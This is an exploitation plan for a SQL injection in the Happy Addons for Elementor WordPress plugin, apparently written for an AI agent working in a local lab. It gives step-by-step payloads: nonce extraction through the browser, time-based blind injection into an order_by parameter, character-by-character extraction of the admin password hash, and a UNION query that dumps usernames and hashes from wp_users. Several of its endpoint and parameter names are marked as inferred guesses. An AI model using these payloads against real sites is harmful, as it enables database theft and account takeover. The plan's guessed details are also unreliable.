Exploitation Research Plan - CVE-2025-68999

1. Vulnerability Summary

The Happy Addons for Elementor plugin (<= 3.20.4) is vulnerable to a SQL Injection vulnerability within its AJAX handling logic. Specifically, the plugin fails to properly sanitize and prepare SQL queries when processing dynamic widget data (e.g., Data Tables, Post Grids) requested via the admin-ajax.php endpoint. Authenticated users with **Contributor-level** permissions or higher can manipulate query parameters (such as order_by, order, or specific filter IDs) to inject arbitrary SQL commands. This exists because the plugin uses string interpolation or concatenation to build database queries instead of consistently using the $wpdb->prepare() method.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php
• AJAX Action: ha_get_query_data (inferred based on plugin architecture for dynamic widget loading) or happy_addons_get_data.
• Vulnerable Parameter: query_args[order_by] or query[sort_by] (inferred).
• Authentication: Authenticated (Contributor+). Contributors can access the Elementor editor, which triggers these AJAX requests.
• Preconditions: The plugin must be active, and the attacker must have a valid session for a user with at least edit_posts capabilities (Contributor).

3. Code Flow (Inferred)

1. Entry Point: The attacker sends a POST request to admin-ajax.php with action=ha_get_query_data.
2. Hook Registration: The plugin registers the action via:
   add_action( 'wp_ajax_ha_get_query_data', 'ha_get_query_data_handler' );
3. Handler Function: The handler retrieves the query or query_args array from $_POST.
4. Sink: The logic passes these arguments into a query builder class (e.g., Happy_Addons\Elementor\Query_Builder).
5. Vulnerability: Inside the query builder, a parameter like order_by is directly appended to a SQL string:
   $sql = "SELECT ... ORDER BY " . $query_args['order_by'];
6. Execution: $wpdb->get_results($sql) executes the malicious payload.

4. Nonce Acquisition Strategy

The ha_get_query_data action typically requires a nonce for validation via check_ajax_referer.

• Nonce Variable: happy_addons_config or HappyAddonsConfig (inferred).
• Nonce Key: nonce or ajax_nonce.
• Acquisition Steps:
  1. Log in as a Contributor.
  2. Create or Edit a post using Elementor: wp post create --post_type=page --post_status=publish --post_title="Exploit Page" --post_content='' (then open in editor).
  3. The plugin enqueues scripts that contain the nonce in the editor view.
  4. Use browser_navigate to the Elementor editor URL for the created page.
  5. Use browser_eval to extract the nonce:
     browser_eval("window.happy_addons_config?.nonce || window.HappyAddonsConfig?.ajax_nonce")

5. Exploitation Strategy

We will use a time-based blind SQL injection to confirm the vulnerability, as it is the most reliable method when output might not be directly reflected.

Step-by-Step Plan:

1. Login: Authenticate as a Contributor user.
2. Nonce Extraction: Navigate to a page where the Happy Addons scripts load and extract the nonce using the strategy above.
3. Payload Construction:
   • We will target the order_by parameter.
   • Payload: (CASE WHEN (SELECT 1)=1 THEN SLEEP(5) ELSE 1 END)
4. HTTP Request:
   • Method: POST
   • URL: http://localhost:8080/wp-admin/admin-ajax.php
   • Headers: Content-Type: application/x-www-form-urlencoded
   • Body:

     action=ha_get_query_data&
     nonce=[EXTRACTED_NONCE]&
     query[order_by]=(CASE WHEN (1=1) THEN SLEEP(5) ELSE 1 END)
     

5. Validation: If the response time is > 5 seconds, the injection is successful.

6. Test Data Setup

1. User Creation:
   wp user create attacker attacker@example.com --role=contributor --user_pass=password
2. Plugin Setup: Ensure Happy Addons for Elementor v3.20.4 is installed and active.
3. Content Creation:
   wp post create --post_type=page --post_title="Test Page" --post_status=publish
   (Note: The Elementor editor must be accessible to the contributor for this page).

7. Expected Results

• Success: The HTTP request to admin-ajax.php will hang for approximately 5 seconds before returning a response.
• Payload for Data Extraction: To extract the admin password hash:
  query[order_by]=(CASE WHEN (ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36) THEN SLEEP(5) ELSE 1 END) (36 is ASCII for $).

8. Verification Steps

• Database Side: Check the MySQL general query log (if enabled) to see the executed query:
  tail -f /var/lib/mysql/mysql.log | grep "SLEEP"
• Response Timing: Use the http_request tool's response metadata to verify elapsed_time >= 5000ms.

9. Alternative Approaches

• Error-Based: If WP_DEBUG is on, try injecting a syntax error to see if the database error is leaked:
  query[order_by]=invalid_column_name
• UNION-Based: If the AJAX handler returns results (e.g., for a "Live Search" widget), attempt a UNION select:
  query[order_by]=id) UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users-- -
  (Requires guessing the correct number of columns in the original SELECT).
• Different Parameter: If order_by is sanitized, try query[post_type] or query[taxonomy].